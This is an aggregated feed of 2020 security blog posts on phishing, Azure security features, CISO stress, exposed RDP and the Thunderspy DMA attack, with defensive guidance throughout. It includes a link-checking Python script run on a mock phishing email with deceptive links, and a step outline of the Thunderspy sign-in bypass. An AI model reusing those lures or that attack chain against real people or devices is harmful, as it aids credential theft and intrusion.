Phishing is one of the oldest cyberthreats in the book, and yet still one of the most effective. As people across the globe find themselves taking to the internet more than ever before, criminals see this as an opportunity to release phishing attacks on unsuspecting users. In fact, Security Boulevard found a 600% rise in phishing campaigns in the last month. So, as users leverage the World Wide Web to stay connected with friends and loved ones, it’s imperative that they remain wary of scammers looking to exploit our need to virtually communicate. With that, let’s take a look at why phishing is so effective even in 2020 and explore what actions users can take to stay protected. 

What is Phishing?

Phishing attacks occur when scammers attempt to trick users out of money or personal information, usually by email, phone, or text. With so many avenues for criminals to hook victims, phishing is one of the most prevalent threats we see today. As part of their phishing schemes, scammers often use something called social engineering to manipulate users into trusting them for fraudulent purposes, often by pretending to be a legitimate person or business. Through these phishing attacks, criminals can spread malware and other malicious content.  

The Evolution of Phishing

As new technology and circumstances arise, scammers find new ways to evolve the age-old technique of phishing. What originated as email and instant messages attempting to steal users’ credentials has since taken on new forms like SMiShing or adapted its content to hook the victim with a shocking subject line. 

Why has this technique continued to plague users since its inception? Hackernoon argues that it’s because phishing doesn’t require in-depth networking knowledge or even basic programming skills. It simply relies on human error and the lack of online security awareness, manipulating human psychology just as much as technological tools.  

Phishing Capitalizes on Emotion

Let’s face it – we’re all human. Our inherent psychology makes us quick to act on emotion. However, this is much of the reason why phishing has forged on as a favorite among hackers. Unfortunately, criminals tend to capitalize on bad or shocking news to grasp the victim’s attention, leading them to click on malicious links or give up personal data all too eagerly. Take today’s environment, for example. As businesses are faced with budget cuts and organizational restructuring, many users might be uncertain about their job security – an opportunity that scammers are eager to exploit. In fact, some organizations have recently observed phishing emails with subject lines reading “HR Termination List.” Through these malicious attempts, fraudsters use fear tactics to tempt recipients into clicking on links in emails or downloading dangerous content.  

With millions of users suddenly out of work, a lot of people have found themselves desperately looking for new job opportunities or seeking financial help. However, users should not let their guard down while job hunting, as this could prevent them from noticing the tell-tale signs of phishing. According to The Motley Fool, some phishing emails and text messages claim to offer work-from-home job opportunities, information about health insurance or Medicare, or loans or other forms of financial relief. In fact, the Federal Communications Commission (FCC) reported that many Americans have received texts from the "FCC Financial Care Center" offering $30,000 in relief for those who have recently been laid off or furloughed. While this might appear to be a saving grace, it is a lure designed to trick users into giving up their credentials.

Act Now to Stay Protected

So, whether you're working from home, participating in distance learning to complete college courses, or video chatting with loved ones, there will always be fraudsters looking to exploit your online activity. However, there are proactive measures you can take to help ensure your security. First and foremost is using comprehensive security software. If you've never been targeted by a phishing scam, it might be difficult to envision the benefit of installing a security solution. You might even be convinced that if you haven't been targeted yet, then you won't be in the future. However, there's no off-season when it comes to security. As fraudsters continue to evolve their techniques, security software acts as an added safety net in the event that a phishing email appears in your inbox.

Aside from using comprehensive security software, here are some other tips to help protect your online security.  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or with information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be cautious of emails asking you to act

If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links. 

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will show you where the link really points, which is often not what the visible text says. If the URL looks suspicious, don't interact with it and delete the message altogether.
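The same "hover and compare" check can be done programmatically on an HTML message. The block below is an added example, not McAfee code: it pulls every link out of a constructed HTML email body, compares the visible text with the host the href actually points to, and flags the common tricks (text showing one domain while the link goes to another, a raw IP address instead of a domain, a punycode host, and the `user@host` form where the part before `@` is a decoy). The sample message and all domain names in it are made up.

```python
"""
Added example: inspecting links in a constructed HTML email the way a person
would by hovering over them. Not McAfee code; domains and the message are made up.
"""
import ipaddress
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit


class LinkCollector(HTMLParser):
    """Collect (visible_text, href) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


# Visible text that itself looks like a URL or bare domain (e.g. "https://www.bank.example").
DOMAIN_LIKE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/?#].*)?$", re.I)


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def inspect_link(text: str, href: str) -> List[str]:
    """Return reasons the link looks suspicious; an empty list means nothing was noticed."""
    reasons = []
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        reasons.append(f"non-web scheme {parts.scheme!r}")
        return reasons
    if parts.username is not None:
        # https://www.bank.example@evil.example/ : the browser ignores everything before '@'
        reasons.append("userinfo before '@' hides the real host")
    if is_ip_literal(host):
        reasons.append("raw IP address instead of a domain name")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode (IDN) host, possible homoglyph domain")
    m = DOMAIN_LIKE.match(text.strip())
    if m:
        shown = m.group(1).lower()
        # The text may name the site or its parent domain, but nothing else.
        if shown != host and not host.endswith("." + shown):
            reasons.append(f"text shows {shown} but link goes to {host}")
    return reasons


def inspect_email(html: str) -> Dict[str, List[str]]:
    """Map each href in the message to the list of reasons it looks suspicious."""
    collector = LinkCollector()
    collector.feed(html)
    return {href: inspect_link(text, href) for text, href in collector.links}


# Constructed sample message: one honest link, three that a hover would expose.
SAMPLE_EMAIL = """
<p>Your account has been suspended. Sign in at
<a href="https://secure-login.example.net/reset">https://www.bank.example</a>
or <a href="http://198.51.100.7/login">this link</a>.
Read our <a href="https://www.bank.example/policy">policy</a>.
<a href="https://www.bank.example@evil.example/">https://www.bank.example</a>
</p>
"""

if __name__ == "__main__":
    for href, reasons in inspect_email(SAMPLE_EMAIL).items():
        print(href, "->", reasons or "ok")
```

A mail gateway or a browser extension would apply the same comparison to every message; the check is deliberately conservative (it only complains about text that looks like a domain) so that ordinary "click here" links are not flagged.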

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Protect Yourself Against Phishing Scams With These Security Tips appeared first on McAfee Blogs.

Microsoft Build brings new innovations and capabilities to keep developers and customers secure

As both organizations and developers adapt to the new reality of working and collaborating in a remote environment, it’s more important than ever to ensure that their experiences are secure and trusted. As part of this week’s Build virtual event, we’re introducing new Identity innovation to help foster a secure and trustworthy app ecosystem, as well as announcing a number of new capabilities in Azure to help secure customers.

New Identity capabilities to help foster a secure apps ecosystem

As organizations continue to adapt to the new requirements of remote work, we’ve seen an increase in the deployment and usage of cloud applications. These cloud applications often need access to user or company data, which has increased the need to provide strong security not just for users but applications themselves. Today we are announcing several capabilities for developers, admins, and end-users that help foster a secure and trustworthy app ecosystem:

  1. Publisher Verification allows developers to demonstrate to customers, with a verified checkmark, that the application they’re using comes from a trusted and authentic source. Applications marked as publisher verified means that the publisher has verified their identity through the verification process with the Microsoft Partner Network (MPN) and has associated their MPN account with their application registration.
  2. Application consent policies allow admins to configure policies that determine which applications users can consent to. Admins can allow users to consent to applications that have been Publisher Verified, helping developers unlock user-driven adoption of their apps.
  3. The Microsoft Authentication Library (MSAL) for Angular is generally available and our web library identity.web for ASP.NET Core is in public preview. MSAL makes it easy to implement the right authentication patterns, security features, and integration points that support any Microsoft identity, from Azure Active Directory (Azure AD) accounts to Microsoft accounts.

In addition, we’re making it easier for organizations and developers to secure, manage and build apps that connect with different types of users outside an organization with Azure AD External Identities now in preview. With Azure AD External Identities, developers can build flexible, user-centric experiences that enable self-service sign-up and sign-in and allow continuous customization without duplicating coding effort.

You can learn even more about our Identity-based solutions and additional announcements by heading over to the Azure Active Directory Tech Community blog and reading Alex Simons’ post.

Azure Security Center innovations

Azure Security Center is a unified infrastructure security management system for both Azure and hybrid cloud resources on-premises or in other clouds. We’re pleased to announce two new innovations for Azure Security Center, both of which will help secure our customers:

First, we're announcing that the Azure Secure Score API is now available to customers, bringing even more innovation to Secure Score, which is a central component of security posture management in Azure Security Center. The recent enhancements to Secure Score (in preview) give customers an easier-to-understand and more effective way to assess risk in their environment and prioritize which action to take first in order to reduce it. They also simplify the long list of findings by grouping the recommendations into a set of Security Controls, each representing an attack surface and scored accordingly.

Second, we're announcing that suppression rules for Azure Security Center alerts are now publicly available. Customers can use suppression rules to reduce alert fatigue and focus on the most relevant threats by hiding alerts that are known to be innocuous or related to normal activities in their organization. Suppressed alerts will be hidden in Azure Security Center and Azure Sentinel but will still be available with 'dismissed' state. You can learn more about suppression rules by visiting Suppressing alerts from Azure Security Center's threat protection.

Azure Disk Encryption and encryption & key management updates

We continue to invest in encryption options for our customers. Here are our most recent updates:

  1. Fifty more Azure services now support customer-managed keys for encryption at rest. This helps customers control their encryption keys to meet their compliance or regulatory requirements. The full list of services is here. We have now made this capability part of the Azure Security Benchmark, so that customers can govern the use of all their Azure services in a consistent manner.
  2. Azure Disk Encryption helps protect data on disks that are used with VM and VM Scale sets, and we have now added the ability to use Azure Disk Encryption to secure Red Hat Enterprise Linux BYOS Gold Images. The subscription must be registered before Azure Disk Encryption can be enabled.

Azure Key Vault innovation

Azure Key Vault is a unified service for secret management, certificate management, and encryption key management, backed by FIPS-validated hardware security modules (HSMs). Here are some of the new capabilities we are bringing for our customers:

  1. Enhanced security with Private Link—This is an optional control that enables customers to access their Azure Key Vault over a private endpoint in their virtual network. Traffic between their virtual network and Azure Key Vault flows over the Microsoft backbone network, thus providing additional assurance.
  2. More choices for BYOK—Some of our customers generate encryption keys outside Azure and import them into Azure Key Vault, in order to meet their regulatory needs or to centralize where their keys are generated. Now, in addition to nCipher nShield HSMs, they can also use SafeNet Luna HSMs or Fortanix SDKMS to generate their keys. These additions are in preview.
  3. Make it easier to rotate secrets—Earlier we released a public preview of notifications for keys, secrets, and certificates. This allows customers to receive events at each point of the lifecycle of these objects and define custom actions. A common action is rotating secrets on a schedule so that they can limit the impact of credential exposure. You can see the new tutorial here.

Platform security innovation

Platform security for customers’ data recently took a big step forward with the General Availability of Azure Confidential Computing. Using the latest Intel SGX CPU hardware backed by attestation, Azure provides a new class of VMs that protects the confidentiality and integrity of customer data while in memory (or “in-use”), ensuring that cloud administrators and datacenter operators with physical access to the servers cannot access the customer’s data.

Customer Lockbox for Microsoft Azure provides an interface for customers to review and approve or reject customer data access requests. It is used in cases where a Microsoft engineer needs to access customer data during a support request. In addition to expanded coverage of services in Customer Lockbox for Microsoft Azure, this feature is now available in preview for our customers in Azure Government cloud.

You can learn more about our Azure security offerings by heading to the Azure Security Center Tech Community.

The post Microsoft Build brings new innovations and capabilities to keep developers and customers secure appeared first on Microsoft Security.

Passwords are and have always been an Achilles Heel in CyberSecurity

LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

Quotes
“I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

"There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

"The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

"Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

"As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

"The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

"Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts break down the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

"When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

CISOs are critical to thriving companies: Here’s how to support their efforts

Even before COVID-19 initiated an onslaught of additional cybersecurity risks, many chief information security officers (CISOs) were struggling. According to a 2019 survey of cybersecurity professionals, these critical data defenders were burned out. At the time, 64% were considering quitting their jobs, and nearly as many, 63%, were looking to leave the industry altogether. Of course, COVID-19 and the ensuing remote work requirements have made the problem worse. It’s clear that companies could be facing … More

The post CISOs are critical to thriving companies: Here’s how to support their efforts appeared first on Help Net Security.

Review: Kill Chain: The Cyber War on America’s Elections

Kill Chain is an HBO documentary made and produced by Simon Arizzone, Russell Michaels and Sarah Teale. Kill Chain: Inside the documentary Arizzone and Michaels already worked on a documentary in 2006 called Hacking Democracy, which was about uncovering voting machine vulnerabilities and about how votes were manipulated, leading to George W. Bush winning the elections (2004). And here we are again in 2020 talking about the same problem and uncovering the same old security … More

The post Review: Kill Chain: The Cyber War on America’s Elections appeared first on Help Net Security.

How a good user experience brings the pieces of the enterprise IT jigsaw together

Have you ever done a jigsaw puzzle with pieces missing? Or tried to do a complicated one with only part of the picture showing on the box lid? If so, you will know how it feels to be the folks working to create secure, robust, and seamless enterprise IT systems. Enterprise IT has morphed into something that can feel complex and messy at best and out of control at worst. Each deployment can be convoluted, … More

The post How a good user experience brings the pieces of the enterprise IT jigsaw together appeared first on Help Net Security.

Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic

As most of the UK’s cybersecurity workforce now sits at home isolated while carrying out an already pressurised job, there is every possibility that this could be affecting their mental health. In light of Mental Health Awareness Week, and as the discussion around employee wellbeing becomes louder and louder amidst the COVID-19 pandemic, we spoke with five cybersecurity experts to get their thoughts on how organisations can minimise the negative mental and physical impacts on … More

The post Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic appeared first on Help Net Security.

How data intelligent organizations mitigate risk

Organizations that put data at the center of their vision and strategy realize a differentiated competitive advantage by mitigating cost and risk, growing revenue and improving the customer experience, a Collibra survey of more than 900 global business analysts reveals. Orgs rarely use data to guide business decisions Despite a majority of companies saying they valued using data to drive decisions, many organizations are not consistently executing. While 84% of respondents said that it is … More

The post How data intelligent organizations mitigate risk appeared first on Help Net Security.

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they used to be three months ago. Many users have made the transition from working in an office to working from home and students have adopted distance learning. But while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.

As users adapt to their increased time spent at home and online, hackers are taking advantage by spreading malware and other scams. Let's break down some of the major malware scams affecting users today, as well as how they can stay secure.

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP). RDP is a Microsoft protocol that allows communication with a remote system. At a time when connectivity is more important than ever before, it's critical for users to be able to easily access the same tools and apps that they would in their office from their newfound remote work environments. However, it's likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet, an attacker who compromises one RDP host can use it as a foothold into a remote employee's system and, from there, into the wider network. What's more, these networks can then be used as entry points for spreading malware or other malicious activities.

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotely? Because exposed RDP ports grant criminals access to remote systems, they are able to carry out a number of malicious activities that could impact not only users working from home but also the organizations they work for. These include spreading spam and malware, as well as using the compromised RDP host to disguise malicious activity and compile their tools on the machine.

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails about current events to lure people into engaging with malicious content and enabling threats to gain access to their systems. Once established, that foothold can allow hackers to use malware to steal usernames and passwords and other data, monitor user activity, capture keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. Criminals can also impersonate their victim, sending emails from the infected devices to propagate the malware to numerous other systems. What's more, hackers could spread ransomware that encrypts system files and refuses to decrypt them until the victim sends a ransom payment.

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors for breaking into organizations and personal networks, it's important to follow security best practices. This includes using strong passwords and multi-factor authentication, patching vulnerabilities immediately, and not allowing RDP connections over the open internet (put RDP behind a VPN or gateway instead). Discover more best practices on how to secure RDP in our blog on RDP security.

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How to Stay Protected From Malware While Online at Home appeared first on McAfee Blogs.

5 Ways Cyber Security Is Changing In 2020

Introduction

Security whilst online has been paramount for many years, and with the ever-advancing technology available to us, cybersecurity is constantly evolving. Whilst the internet is an invaluable resource for our modern lives, it can also be a dangerous place. With these new advances in security, 2020 is set to bring changes in cybersecurity, both good and bad; in this article we explain them.

5 Ways Cyber Security Is Changing In 2020

1. Artificial Intelligence

Artificial intelligence, or AI as it is more commonly known, has been around for a while now. However, in 2020 this ever-changing technology is expected to be used more frequently, both by those looking for targets online and by those trying to stop the ‘bad guys.’ It can detect patterns in online behavior and respond accordingly, with far less human intervention.

2. 5G

There are a lot of theories surrounding the rollout of 5G, but until it is in wide use no one can really predict its impact. One thing is certain: we will be exposed to it this year, and according to reports its security is not yet mature enough to withstand the volume of threats online. Those at the top of tech will therefore need to be on high alert to keep on top of cybersecurity as 5G comes into use.

3. Cyber Security Technology Platforms

This might seem like a complex term, and it is. In short, these platforms are made up of five major components that together provide top-level security, and they look set to become the preferred approach over the single-component tools of previous years.

4. Hackers Are Going To The Source

In years gone by hackers and cybercriminals would target individuals or companies, but with the advances we are seeing in technology they are now able to target service providers. A single compromised provider means access to thousands of its customers and their information, which is what makes this a supply-chain attack. It sounds scary, and it is. On the flip side, these service providers also have access to equally innovative technology to fight back.

5. Risk Management

Responding to cybercrimes one at a time is a fight that nobody is ever going to win. In 2020 the focus looks set to shift towards managing risk, so that attacks are stopped before the perpetrators have a chance to carry them out. Businesses operating online now have access to a wide range of tools that help them prevent attacks, stopping them at the source.

Conclusion

It is astonishing how fast technology is moving forward, and that speed is bound to translate into ever-changing online trends; cybersecurity is no exception. If you are concerned about cybersecurity there are many tools and programs you can use, and funding them couldn’t be easier with websites such as NowLoan, which let you find the best loans to fund your cybersecurity efforts.

The post 5 Ways Cyber Security Is Changing In 2020 appeared first on .

Redefining business for a digital world with smart security decisions

Kurt John is Chief Cybersecurity Officer of Siemens USA, where he is responsible for the information security strategy, governance and implementation for the company’s largest market with ~$23B in annual revenues. In this interview with Help Net Security, he explores a variety of smart security decisions. Kurt discusses the challenges modern CISO have to deal with, the importance of IT security certification, he provides his opinion on what an ideal cybersecurity candidate looks like, and … More

The post Redefining business for a digital world with smart security decisions appeared first on Help Net Security.

Security and the rapidly growing importance of mobile apps

Organizations are under more pressure than ever before to rapidly produce both new apps and updates to existing apps, not only because it’s essentially the only way they can interact with their customers, but also because there will be a flood of new users who previously relied on physical locations to conduct their business. Continuous mobile development is now more critical than ever, and organizations must provide error-free, engaging user experiences. In the rush to … More

The post Security and the rapidly growing importance of mobile apps appeared first on Help Net Security.

Shifting responsibility is causing uncertainty and more security breaches

Data security is creating fear and trust issues for IT professionals, according to a new Oracle and KPMG report. The study of 750 cybersecurity and IT professionals across the globe found that a patchwork approach to data security, misconfigured services and confusion around new cloud security models has created a crisis of confidence that will only be fixed by organizations making security part of the culture of their business. Data security is keeping IT professionals … More

The post Shifting responsibility is causing uncertainty and more security breaches appeared first on Help Net Security.

Identity-related breaches on the rise, prevention still a work in progress

The number of workforce identities in the enterprise is growing dramatically, largely driven by DevOps, automation, and an increase in enterprise connected devices, which will only continue to accelerate identity growth, an IDSA survey of 502 IT security and identity decision makers reveals. At the same time, compromised identities remain one of the leading causes of a data breach. According to the study, the vast majority of IT security and identity professionals have experienced an … More

The post Identity-related breaches on the rise, prevention still a work in progress appeared first on Help Net Security.

Less than a quarter of Americans use a password manager

A large percentage of Americans currently do not take the necessary steps to protect their passwords and logins online, FICO reveals. As consumers’ reliance on online services grows in response to COVID-19, the study examined the steps Americans are taking to protect their financial information online, as well as attitudes towards increased digital services and alternative security options such as behavioral biometrics. Do you use a password manager? The study found that a large percentage … More

The post Less than a quarter of Americans use a password manager appeared first on Help Net Security.

Modern crypto standards pave the way to stronger security

Cyberthreats are a ubiquitous concern for organizations operating in the digital world. No company is immune — even large and high-profile organizations like Adobe, Yahoo, LinkedIn, Equifax and others have reported massive data breaches in recent years. Cyberattacks are only growing in frequency, affecting billions of people and threatening businesses. What’s being done to bolster information security as cyberattacks continue to happen? The National Institute of Standards and Technology (NIST), a non-regulatory agency of the … More

The post Modern crypto standards pave the way to stronger security appeared first on Help Net Security.

New software enables existing sensors to detect ransomware

Engineers from SMU’s Darwin Deason Institute for Cybersecurity have developed software to detect ransomware attacks before attackers can inflict catastrophic damage. Ransomware is crippling cities and businesses all over the world, and the number of ransomware attacks has increased since the start of the coronavirus pandemic. Attackers are also threatening to publicly release sensitive data if the ransom isn’t paid. The FBI estimates that ransomware victims have paid hackers more than $140 million in the last … More

The post New software enables existing sensors to detect ransomware appeared first on Help Net Security.

COVID-19 online fraud trends: Industries, schemes and targets

The telecommunications, retail and financial services industries have been increasingly impacted by COVID-19 online fraud, according to TransUnion. From a consumer perspective, Millennials have been most targeted by fraudsters using COVID-19 scams. Overall, the percent of suspected fraudulent digital transactions rose 5% from March 11 to April 28 when compared to Jan. 1 to March 10, 2020. More than 100 million risky transactions from March 11 to April 28 have been identified. “Given the billions … More

The post COVID-19 online fraud trends: Industries, schemes and targets appeared first on Help Net Security.

Businesses vulnerable to emerging risks have a gap in their insurance coverage

The majority of business decision makers are insured against traditional cyber risks, such as breaches of personal information, but most were vulnerable to emerging risks, such as malware and ransomware, revealing a potential insurance coverage gap, according to the Hanover Insurance Group. The report surveyed business decision makers about cyber vulnerabilities and risk mitigation efforts. Insurance purchasing decisions influenced by media coverage Most businesses surveyed indicated they had purchased cyber insurance, and more than 70% … More

The post Businesses vulnerable to emerging risks have a gap in their insurance coverage appeared first on Help Net Security.

Educational organizations use cloud apps to share sensitive data outside of IT control

Many educational organizations are at risk of data security incidents during the current period of working from home and virtual learning, a Netwrix report reveals. Weak data security controls According to the survey, even before the COVID-19 pandemic, the majority of educational organizations had weak data security controls. In particular, 54% of IT professionals in the educational sector confessed that employees put data at risk by sharing it via cloud apps outside of IT knowledge. … More

The post Educational organizations use cloud apps to share sensitive data outside of IT control appeared first on Help Net Security.

Secured-core PCs help customers stay ahead of advanced data theft

Researchers at the Eindhoven University of Technology recently revealed information around “Thunderspy,” an attack that relies on leveraging direct memory access (DMA) functionality to compromise devices. An attacker with physical access to a system can use Thunderspy to read and copy data even from systems that have encryption with password protection enabled.

Secured-core PCs provide customers with Windows 10 systems that come configured from OEMs with a set of hardware, firmware, and OS features enabled by default, mitigating Thunderspy and any similar attacks that rely on malicious DMA.

How Thunderspy works

Like any other modern attack, Thunderspy relies on not one but multiple building blocks being chained together. Below is a summary of how Thunderspy can be used to access a system where the attacker does not have the password needed to sign in. A video from the Thunderspy research team showing the attack is available here.

Step 1: A serial peripheral interface (SPI) flash programmer called Bus Pirate is plugged into the SPI flash of the device being attacked. This gives access to the Thunderbolt controller firmware and allows an attacker to copy it over to the attacker’s device

Step 2: The Thunderbolt Controller Firmware Patcher (tcfp), which is developed as part of Thunderspy, is used to disable the security mode enforced in the Thunderbolt firmware copied over using the Bus Pirate device in Step 1

Step 3: The modified insecure Thunderbolt firmware is written back to the SPI flash of the device being attacked

Step 4: A Thunderbolt-based attack device is connected to the device being attacked, leveraging the PCILeech tool to load a kernel module that bypasses the Windows sign-in screen

Diagram showing how the Thunderspy attack works

The result is that an attacker can access a device without knowing the sign-in password for the device. This means that even if a device was powered off or locked by the user, someone that could get physical access to the device in the time it takes to run the Thunderspy process could sign in and exfiltrate data from the system or install malicious software.

Secured-core PC protections

In order to counteract these targeted, modern attacks, Secured-core PCs use a defense-in-depth strategy that leverages features like Windows Defender System Guard and virtualization-based security (VBS) to mitigate risk across multiple areas, delivering comprehensive protection against attacks like Thunderspy.

Mitigating Steps 1 to 4 of the Thunderspy attack with Kernel DMA protection

Secured-core PCs ship with hardware and firmware that support Kernel DMA protection, which is enabled by default in the Windows OS. Kernel DMA protection relies on the Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA unless an authorized user is signed in and the screen is unlocked. Watch this video from the 2019 Microsoft Ignite to see how Windows mitigates DMA attacks.

This means that even if an attacker was able to copy a malicious Thunderbolt firmware to a device, the Kernel DMA protection on a Secured-core PC would prevent any accesses over the Thunderbolt port unless the attacker gains the user’s password in addition to being in physical possession of the device, significantly raising the degree of difficulty for the attacker.

Hardening protection for Step 4 with Hypervisor-protected code integrity (HVCI)

Secured-core PCs ship with hypervisor-protected code integrity (HVCI) enabled by default. HVCI uses the hypervisor to enable VBS and to isolate the code integrity subsystem, which verifies that all kernel code in Windows is signed, from the normal kernel. In addition to isolating the checks, HVCI also ensures that kernel memory cannot be both writable and executable, so unverified code does not execute.

HVCI helps to ensure that malicious kernel modules like the one used in Step 4 of the Thunderspy attack cannot execute easily as the kernel module would need to be validly signed, not revoked, and not rely on overwriting executable kernel code.

Modern hardware to combat modern threats

A growing portfolio of Secured-core PC devices from the Windows OEM ecosystem are available for customers. They provide a consistent guarantee against modern threats like Thunderspy with the variety of choices that customers expect to choose from when acquiring Windows hardware. You can learn more here: https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers


Nazmus Sakib

Enterprise and OS Security 

The post Secured-core PCs help customers stay ahead of advanced data theft appeared first on Microsoft Security.

Empowering your remote workforce with end-user security awareness

COVID-19 has rapidly transformed how we all work. Organizations need quick and effective user security and awareness training to address the swiftly changing needs of the new normal for many of us. To help our customers deploy user training quickly, easily and effectively, we are announcing the availability of the Microsoft Cybersecurity Awareness Kit, delivered in partnership with Terranova Security. For those of you ready to deploy training right now, access your kit here. For more details, read on.

Work at home may happen on unmanaged and shared devices, over insecure networks, and in unauthorized or non-compliant apps. The new environment has put cybersecurity decision-making in the hands of remote employees. In addition to the rapid dissolution of corporate perimeters, the threat environment is evolving rapidly as malicious actors take advantage of the current situation to mount coronavirus-themed attacks. As security professionals, we can empower our colleagues to protect themselves and their companies. But choosing topics, producing engaging content, and managing delivery can be challenging, sucking up time and resources. Our customers need immediate deployable and context-specific security training.

CYBERSECURITY AWARENESS KIT

At RSA 2020 this year, we announced our partnership with Terranova Security, to deliver integrated phish simulation and user training in Office 365 Advanced Threat Protection later this year. Our partnership combines Microsoft’s leading-edge technology, expansive platform capabilities, and unparalleled threat insights with Terranova Security’s market-leading expertise, human-centric design and pedagogical rigor. Our intelligent solution will turbo-charge the effectiveness of phish simulation and training while simplifying administration and reporting. The solution will create and recommend context-specific and hyper-targeted simulations, enabling you to customize your simulations to mimic real threats seen in different business contexts and train users based on their risk level. It will automate simulation management from end to end, providing robust analytics to inform the next cycle of simulations and enable rich reporting.

Our Cybersecurity Awareness Kit now makes available a subset of this user-training material relevant to COVID-19 scenarios to aid security professionals tasked with training their newly remote workforces. The kit includes videos, interactive courses, posters, and infographics like the one below. You can use these materials to train your remote employees quickly and easily.

Beware of COVID-19 Cyber Scams

For Security Professionals, we have created a simple way to host and deliver the training material within your own environment or direct your users to the Microsoft 365 security portal, where the training is hosted as seen below. All authenticated Microsoft 365 users will be able to access the training on the portal. Admins will see the option to download the kit as well. Follow the simple steps, detailed in the README, to deploy the awareness kit to your remote workforce.

ACCESSING THE KIT

All Microsoft 365 customers can access the kit and directions on the Microsoft 365 Security and Compliance Center through this link. If you are not a Microsoft 365 customer or would like to share the training with family and friends who are not employees of your organization, Terranova Security is providing free training material for end-users.

Deploying quick and effective end-user training to empower your remote workforce is one of the ways Microsoft can help customers work productively and securely through COVID-19. For more resources to help you through these times, visit Microsoft’s Secure Remote Work Page for the latest information.

The post Empowering your remote workforce with end-user security awareness appeared first on Microsoft Security.

CISO stress-busters: post #1 overcoming obstacles

As part of the launch of the U.S. space program’s moon shot, President Kennedy famously said we do these things “not because they are easy, but because they are hard.” The same can be said for the people responsible for security at their organizations; it is not a job one takes because it is easy. But it is critically important to keep our digital lives and work safe. And for the CISOs and leaders of the world, it is a job that is more than worth the hardships.

Recent research from Nominet paints a concerning picture of a few of those hardships. Forty-eight percent of CISO respondents indicated work stress had negatively impacted their mental health, almost double the number from last year’s survey. Thirty-one percent reported job stress had negatively impacted their physical health, and 40 percent have seen job stress affecting their personal lives. Add a fairly rapid churn rate (26 months on average) to all that, and it’s clear CISOs are managing a tremendous amount of stress every day. And when crises hit, from incident response after a breach to a suddenly remote workforce after COVID-19, that stress only shoots higher.

Which is why we’re starting this new blog series called “CISO stress-busters.” In the words of CISOs from around the globe, we’ll be sharing insights, guidance, and support from peers on the front lines of the cyber workforce. Kicking us off—the main challenges that CISOs face and how they turn those obstacles into opportunity. The goal of the series is to be a bit of chicken (or chik’n for those vegans out there) soup for the CISO’s soul.

Today’s post features wisdom from three CISOs/Security Leaders:

  • TM Ching, Security CTO at DXC Technology
  • Jim Eckart, (former) CISO at Coca-Cola
  • Jason Golden, CISO at Mainstay Technologies

Clarifying contribution

